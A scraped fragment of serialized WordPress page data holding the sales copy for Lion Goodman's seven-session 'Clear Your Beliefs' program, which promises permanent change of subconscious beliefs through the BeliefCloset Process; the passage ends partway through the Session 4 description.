wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:60593:"<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n<ul class="indented-img-left">\n	<li>You''re no longer held back by old beliefs and stories.</li>\n	<li>There''s no resistance to doing what needs to be done.</li>\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\n</ul>\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -60px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\nDear Explorer:\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and 